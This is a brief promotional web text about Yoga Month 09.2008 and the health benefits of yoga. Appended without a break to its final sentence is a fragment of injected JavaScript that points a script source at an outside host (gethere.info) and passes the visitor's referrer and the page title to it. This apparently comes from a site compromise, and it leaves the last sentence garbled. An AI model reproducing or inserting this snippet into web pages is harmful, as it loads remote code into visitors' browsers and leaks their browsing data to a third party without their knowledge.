Yoga Month 09.2008 is a grassroots, community-based global campaign to
educate people about the health benefits of yoga and to inspire a healthy
lifestyle. Yoga Journal magazine estimates that 20 million adults in the
United States practice yoga and another 25 million say they intend to try
yoga.
Yoga is a 5,000-year-old exercise for mind, body and spirit. Regular
practice can improve flexibility, balance and breath, and decrease tightness
and tension.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
